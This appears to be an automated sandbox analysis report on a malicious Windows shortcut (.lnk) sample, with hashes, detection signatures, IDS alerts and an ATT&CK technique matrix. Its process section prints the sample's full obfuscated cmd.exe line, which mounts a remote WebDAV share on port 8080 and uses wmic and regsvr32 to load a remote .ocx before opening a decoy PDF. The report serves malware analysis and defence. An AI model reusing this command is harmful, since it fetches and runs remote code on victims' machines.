Windows
Analysis Report
daHTg2LQmU.lnk
Overview
General Information
Sample name: | daHTg2LQmU.lnkrenamed because original name is a hash value |
Original sample name: | 26a989ca3cc6222e3980b874a247112e.lnk |
Analysis ID: | 1581576 |
MD5: | 26a989ca3cc6222e3980b874a247112e |
SHA1: | df7f39d5e475ed6d61055d4a8160b9b6c5348dfa |
SHA256: | 44aa68bbf2c5d018346fdfc21ba1d419f80921c8436778e4baeafbfb40aa6eeb |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Gathers information about network shares
Machine Learning detection for sample
Obfuscated command line found
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 6680 cmdline:
"C:\Window s\System32 \cmd.exe" /v /c "set RQXjD6fW= s^e&& !RQX jD6fW!t "M CYt=3" &&! RQXjD6fW!t "efzo=8" &&!RQXjD6f W!t "ftZA= t" &&!RQXj D6fW!t "TT zp=i" &&!R QXjD6fW!t "chTu=m" & &!RQXjD6fW !t "hGQK=s " &&!RQXjD 6fW!t "rlu F=a" &&!RQ XjD6fW!t " XBYZ=l" && !RQXjD6fW! t "fcfQ=v" &&!RQXjD6 fW!t "YeJz =e" &&!RQX jD6fW!t "x rnc=o" &&! RQXjD6fW!t "MQiS=c" &&!RQXjD6f W!t "orMz= r" &&!RQXj D6fW!t "G4 JhJXG1=\\f ina!ftZA!! TTzp!ck.co !chTu!@!ef zo!080\doc !hGQK!\" & & c!rluF!! XBYZ!l !RQ XjD6fW!t " ze7Pw47M=A cti!fcfQ!! YeJz!P!xrn c!d.o!MQiS !x" && net us!YeJz! !G4JhJXG1! && wm!TTz p!!MQiS! p roc!YeJz!! hGQK!s c!r luF!l!XBYZ ! c!orMz!e !rluF!!ftZ A!!YeJz! " !orMz!!YeJ z!gs!fcfQ! !orMz!!MCY t!2 /!hGQK ! /i !G4Jh JXG1!!ze7P w47M!" && st!rluF!r! ftZA! !G4J hJXG1!Cryp to.pdf " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 6700 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) net.exe (PID: 6872 cmdline:
net use \\ finatick.c om@8080\do cs\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
- cleanup
⊘No configs have been found
⊘No yara matches
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-28T09:29:44.833701+0100 | 1810005 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 65.20.104.212 | 8080 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Networking |
---|
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Data Obfuscation |
---|
Source: | Process created: |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process created: | Jump to behavior |
Source: | Process created: |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.